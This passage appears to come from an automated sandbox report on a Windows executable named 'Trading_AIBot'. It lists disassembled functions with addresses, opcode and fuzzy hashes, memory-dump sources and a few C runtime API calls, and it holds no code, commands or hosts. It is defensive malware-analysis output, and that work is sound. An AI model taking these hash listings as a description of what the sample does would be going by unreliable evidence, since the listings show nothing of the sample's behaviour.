                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3240763771-0
                                                                                                                                      • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                      • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                      • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                      • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                      Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                      • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                      • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                      • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                      • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                      Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                      • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                      • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

                                                                                                                                      Executed Functions

                                                                                                                                      Function 00F17A7A Relevance: .2, Instructions: 203COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: dc9421f933c42fd5c837d7fc24b3c58c9f270b4b5a219e37eb9db22c4441bd0f
                                                                                                                                      • Instruction ID: 0f4e3b0ea1621cee83806093548d8c9b784071653052c7a40cb1fa69af2c3518
                                                                                                                                      • Opcode Fuzzy Hash: dc9421f933c42fd5c837d7fc24b3c58c9f270b4b5a219e37eb9db22c4441bd0f
                                                                                                                                      • Instruction Fuzzy Hash: 42812270D01248CFDB14EFA4D990AEDBBB2FF8A300F2081A9D549AB265DB355D86CF40
                                                                                                                                      Function 00F17E4C Relevance: .1, Instructions: 99COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f695f95790b549fc26a59fe2e8f6441bee431435a6215ade9505cf7f75d6da99
                                                                                                                                      • Instruction ID: 58b99677c9c12783d26ce77be92223690f3cf5244b0ba5295acb6190e37e85d2
                                                                                                                                      • Opcode Fuzzy Hash: f695f95790b549fc26a59fe2e8f6441bee431435a6215ade9505cf7f75d6da99
                                                                                                                                      • Instruction Fuzzy Hash: 1641BCB4D04348DFDB10DFAAC994ADEFBF1AF49310F24802AE409AB250D7749986CF54
                                                                                                                                      Function 00F17E58 Relevance: .1, Instructions: 96COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a5759dd77b6df311e9640f7b6d8a2dc620e53382801d2fcbdf4958e4c194e6a7
                                                                                                                                      • Instruction ID: 29b699e79e1bb73b0a4c213931b7dbc8f7b0052478998707e575e89d564faf99
                                                                                                                                      • Opcode Fuzzy Hash: a5759dd77b6df311e9640f7b6d8a2dc620e53382801d2fcbdf4958e4c194e6a7
                                                                                                                                      • Instruction Fuzzy Hash: CA41BAB4D04348DFDB14DFAAC884ADEFBF5AF48310F24802AE419AB254D7749986DF54
                                                                                                                                      Function 00F15348 Relevance: .9, Instructions: 945COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 07dbd715ef860a15bdf98b33b2585aa075cc7919772752a85b3359caa4e29ad3
                                                                                                                                      • Instruction ID: d86d923e1bdd06060999afe8c67fd8970ca6acf23edd6d76b419a984e27bf8db
                                                                                                                                      • Opcode Fuzzy Hash: 07dbd715ef860a15bdf98b33b2585aa075cc7919772752a85b3359caa4e29ad3
                                                                                                                                      • Instruction Fuzzy Hash: 9EB2D070E02218DFDB64EF64C994BADBBB2BB49300F5085E9E409AB665DB345EC1DF40
                                                                                                                                      Function 00F15358 Relevance: .9, Instructions: 935COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: daff405b5a106077a34f353da334376c08fbd023ac5663d41af63fd080bf21ea
                                                                                                                                      • Instruction ID: aec0bdc6b9bf0fb6a22ecbb3e9c9a2ef98445bf833e29056e8ed382307067ab2
                                                                                                                                      • Opcode Fuzzy Hash: daff405b5a106077a34f353da334376c08fbd023ac5663d41af63fd080bf21ea
                                                                                                                                      • Instruction Fuzzy Hash: AEB2D070E02228DFDB64EF64C994BADB7B2BB49300F5085E9E409AB664DB345EC1DF40
                                                                                                                                      Function 00F1078D Relevance: .6, Instructions: 649COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 062cd31193b8b29df1933c9ac4689dd3ee3e05cc4f8598bc9b26ea59c4b85fb2
                                                                                                                                      • Instruction ID: e152ea08ae59482e1b50a6865caa3994ead56324d028015125c47a879599fd79
                                                                                                                                      • Opcode Fuzzy Hash: 062cd31193b8b29df1933c9ac4689dd3ee3e05cc4f8598bc9b26ea59c4b85fb2
                                                                                                                                      • Instruction Fuzzy Hash: 5072CC74A01259DFDB64EF64DA94B9DBBB2FF4A301F1080AAD509AB361DB305E81CF50
                                                                                                                                      Function 00F10848 Relevance: .6, Instructions: 601COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: eb65fe18aececa60194f903c624968cf4f1d53ccfd62b6c0e83fd6881b56c33f
                                                                                                                                      • Instruction ID: c990aeb7975e2fe1580b16fe9cd75519e7ca8a9e40bf83d68b0cb4a0c7cc9ee6
                                                                                                                                      • Opcode Fuzzy Hash: eb65fe18aececa60194f903c624968cf4f1d53ccfd62b6c0e83fd6881b56c33f
                                                                                                                                      • Instruction Fuzzy Hash: 3662AB74E01259DFDB64EF64DA94B9DBBB2BF89301F1080AAD509AB360DB315E81CF50
                                                                                                                                      Function 00F177C1 Relevance: .3, Instructions: 339COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0dbd74da03b56f4353fbfe626fa702747a1c4a5ca428a943c6c3a66d91a02a53
                                                                                                                                      • Instruction ID: aab1aa192ea906de9a35b2bf2fdc961591fe97fb271d65cbdbd7c923354a7d31
                                                                                                                                      • Opcode Fuzzy Hash: 0dbd74da03b56f4353fbfe626fa702747a1c4a5ca428a943c6c3a66d91a02a53
                                                                                                                                      • Instruction Fuzzy Hash: 67E04F6184D3C05FC3238BB45C656B87F749F17121B2801CAD4D59B1B3D5250957E752
                                                                                                                                      Function 00F167E0 Relevance: .2, Instructions: 229COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 573880d9ffe7248c14e0805cb51d0aef92aa2bac6f6b3d373bcea2144b958783
                                                                                                                                      • Instruction ID: 2f2923bc11a5a9bb7fc5b49ed2e233a19549380a7c2129103db8b44f0cc2795b
                                                                                                                                      • Opcode Fuzzy Hash: 573880d9ffe7248c14e0805cb51d0aef92aa2bac6f6b3d373bcea2144b958783
                                                                                                                                      • Instruction Fuzzy Hash: 9EB1CB74E02228CFEB64DF28C994B9DBBB2BB49304F1085AAD40DA7351DB306E85CF51
                                                                                                                                      Function 00F17178 Relevance: .2, Instructions: 150COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d44595d7c8f0e91a0210fb972cc1e8ab56e818b6fd9ac92ed9a40ed59192c9d7
                                                                                                                                      • Instruction ID: 0049bbde78e6e82e986b98f75fc1adcb222060b66aad12c10e13ae238e532d84
                                                                                                                                      • Opcode Fuzzy Hash: d44595d7c8f0e91a0210fb972cc1e8ab56e818b6fd9ac92ed9a40ed59192c9d7
                                                                                                                                      • Instruction Fuzzy Hash: 7251D678A00248CFCB44DFA9D994A9DBBF2FF49311F108169E819AB365DB31AC46CF14
                                                                                                                                      Function 00F165B0 Relevance: .1, Instructions: 112COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e64c8220e98147e279fdac80199c63b387e484a5f1830239126ac5fbe63895f6
                                                                                                                                      • Instruction ID: ee36d9e862749cbb88a5c23af744ea7266372dd866424142120b9e68a0767610
                                                                                                                                      • Opcode Fuzzy Hash: e64c8220e98147e279fdac80199c63b387e484a5f1830239126ac5fbe63895f6
                                                                                                                                      • Instruction Fuzzy Hash: 8E51E078D05248DFDB04DFA8D5946EDBBF1BF49304F10802AE429AB3A5DB345982EF50
                                                                                                                                      Function 00F17CF6 Relevance: .1, Instructions: 105COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0c7e59d6099115833bc6db54427c21e33b2586786fa90535a6193f339dca7dc4
                                                                                                                                      • Instruction ID: 61d254fbd1d723deff08dbb9a1e74b2442894bac5a5f24e8d44c4bc5c6cb2202
                                                                                                                                      • Opcode Fuzzy Hash: 0c7e59d6099115833bc6db54427c21e33b2586786fa90535a6193f339dca7dc4
                                                                                                                                      • Instruction Fuzzy Hash: 814100B0D04389DFDB15DFA9C884ADEFBF2AF49310F24846AD408AB261C7756886DF50
                                                                                                                                      Function 00F174F2 Relevance: .1, Instructions: 103COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b5df9320ed0e5658c4b696ee5bbaa5b1a9d25e93dd71797d91c423db64738e62
                                                                                                                                      • Instruction ID: 0a96d57e19c6bbc6ec642b56e183d94cd88452e1030ebf7049fd000ad5a9a92a
                                                                                                                                      • Opcode Fuzzy Hash: b5df9320ed0e5658c4b696ee5bbaa5b1a9d25e93dd71797d91c423db64738e62
                                                                                                                                      • Instruction Fuzzy Hash: DF41E175E012089FCB04DFA9D894AEEBBF2BF89301F14806AE515A73A0DB345941CFA0
                                                                                                                                      Function 00F17D08 Relevance: .1, Instructions: 89COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 566d2e7ddea810de44959763314b7f5b3c8ddc6e872fdf32aba5caeca95f5ef4
                                                                                                                                      • Instruction ID: 27335877a25837420ce565893580873947faa44687bbb82df7fff87b1bfdd6fa
                                                                                                                                      • Opcode Fuzzy Hash: 566d2e7ddea810de44959763314b7f5b3c8ddc6e872fdf32aba5caeca95f5ef4
                                                                                                                                      • Instruction Fuzzy Hash: 4041ACB0D04348DFDB14DFAAD984ADEBBF5AF48310F24842AE419AB250DB759885DF50
                                                                                                                                      Function 00F173A0 Relevance: .1, Instructions: 83COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 20d4b79e1578c0cb0dcb7a5a2874f97c8c29871b7b34610c730e0bbbfdcd020a
                                                                                                                                      • Instruction ID: 10a206640330fdee4f4ce88530b20cad7c19847b3cc7f5d6f0eafab0178a9900
                                                                                                                                      • Opcode Fuzzy Hash: 20d4b79e1578c0cb0dcb7a5a2874f97c8c29871b7b34610c730e0bbbfdcd020a
                                                                                                                                      • Instruction Fuzzy Hash: 5F311470E012498FCB05DBB4C9919EEBBB2BF8A304F2084AAD415BB794CB355D42CF64
                                                                                                                                      Function 00F173B0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 13b107652be3739783f7365a653be151008d40b65902e0d9291e4cccf98a6588
                                                                                                                                      • Instruction ID: 6754fa526026f59c9cb56eb803e077d03070d883b63bd020940c62ec27ee5fac
                                                                                                                                      • Opcode Fuzzy Hash: 13b107652be3739783f7365a653be151008d40b65902e0d9291e4cccf98a6588
                                                                                                                                      • Instruction Fuzzy Hash: C121F470E012098FCB08DFA5D9419EEB7B2BF89305F609469D515B7394CB365D41CF64
                                                                                                                                      Function 00F151F7 Relevance: .1, Instructions: 65COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1afce4527d752122e427dba87559a3d8046cb5c8ed885d38807ea22ff7ad1f11
                                                                                                                                      • Instruction ID: 3bc5e85f8e337be49769e9442ba2cf8d158a2998206cd9724a007a4358a98df9
                                                                                                                                      • Opcode Fuzzy Hash: 1afce4527d752122e427dba87559a3d8046cb5c8ed885d38807ea22ff7ad1f11
                                                                                                                                      • Instruction Fuzzy Hash: 07216A719093859FC7029FB4D8593EE7FB0EF47311F0848DAC081A72A2C7780695EB51
                                                                                                                                      Function 00F15238 Relevance: .0, Instructions: 44COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 21088025945a4878899186a75c827642fa327e4b0b882fcf632166cb07a179b7
                                                                                                                                      • Instruction ID: 64c2f8b73aed7a5ceed9963186839495fa621d202a3d34f43d6f3c08c984c575
                                                                                                                                      • Opcode Fuzzy Hash: 21088025945a4878899186a75c827642fa327e4b0b882fcf632166cb07a179b7
                                                                                                                                      • Instruction Fuzzy Hash: CF012875D05319DFDB04EFB4D5583EEBBB0EF46312F0098AA9415A3290DB780A84EFA1
                                                                                                                                      Function 00F17499 Relevance: .0, Instructions: 30COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f769e489d3cfc0487881ad7cfd63d9a76df09a5a367bc48aa3e8c83656083093
                                                                                                                                      • Instruction ID: f74a7a7c64a1c81376b8471385c7a748604d7dc3b1d6453d7f64d18771e319ad
                                                                                                                                      • Opcode Fuzzy Hash: f769e489d3cfc0487881ad7cfd63d9a76df09a5a367bc48aa3e8c83656083093
                                                                                                                                      • Instruction Fuzzy Hash: 88F0BEB48052849FC702EFB8D695AA87FB0EF0B210F1040DAD848E7762C7304D83CB00
                                                                                                                                      Function 00F16C3E Relevance: .0, Instructions: 30COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 32b2b1fe1dc77e2b8f2f23bc58270bd7ffc75ec50d4166bc75552c3af2a79a47
                                                                                                                                      • Instruction ID: a3f1362cddbb37c07c239b8c21fc46f601b8070a3d7ef9e444abddd7cdf050dc
                                                                                                                                      • Opcode Fuzzy Hash: 32b2b1fe1dc77e2b8f2f23bc58270bd7ffc75ec50d4166bc75552c3af2a79a47
                                                                                                                                      • Instruction Fuzzy Hash: D1F0F878D44155CFCB64DFA4E5586ACBBB0EF4A312F0064A6D44AE3260CB3099C5DF64
                                                                                                                                      Function 00F16757 Relevance: .0, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 177a1cde5f67287e9fa18ff2bd52e829d8608e9bd68d1eb9c19fc8d97ed181ae
                                                                                                                                      • Instruction ID: 17fc2057aed0cf88e9fc2803b9fdd0d82b6ab668bcd0df412210af2a1622bde9
                                                                                                                                      • Opcode Fuzzy Hash: 177a1cde5f67287e9fa18ff2bd52e829d8608e9bd68d1eb9c19fc8d97ed181ae
                                                                                                                                      • Instruction Fuzzy Hash: A9E0223090128ACFD705DF60E6A57DD7B78EF16304F00418A984957A92CB351F40EB61
                                                                                                                                      Function 00F174A8 Relevance: .0, Instructions: 22COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2d23ed2f699f0d8b49bef4412443bd3ad2b9e5c0471cbe257286ec885a1be3d2
                                                                                                                                      • Instruction ID: d5c09da4b48e86082a128f28e85537281bf70b64ccbbde2f4f54f45f6c88d160
                                                                                                                                      • Opcode Fuzzy Hash: 2d23ed2f699f0d8b49bef4412443bd3ad2b9e5c0471cbe257286ec885a1be3d2
                                                                                                                                      • Instruction Fuzzy Hash: C3E01AB8D10208DFC744EF78EA88A59BBF4FB09315F1041AAD808D3361E7309D86DB90
                                                                                                                                      Function 00F16768 Relevance: .0, Instructions: 20COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: de37d8d8a6674577705528664f333139856941bc8044774a42c913570765f193
                                                                                                                                      • Instruction ID: f6b45d0ee23ebcdc673b100ab1676fa25fbb4b5236c1f3e85f898db16c0140be
                                                                                                                                      • Opcode Fuzzy Hash: de37d8d8a6674577705528664f333139856941bc8044774a42c913570765f193
                                                                                                                                      • Instruction Fuzzy Hash: 1DE08671901208DFD700EFB8E65579DB7B9EB05305F108569D409D3251DB711E40E790
                                                                                                                                      Function 00F16D40 Relevance: .0, Instructions: 17COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
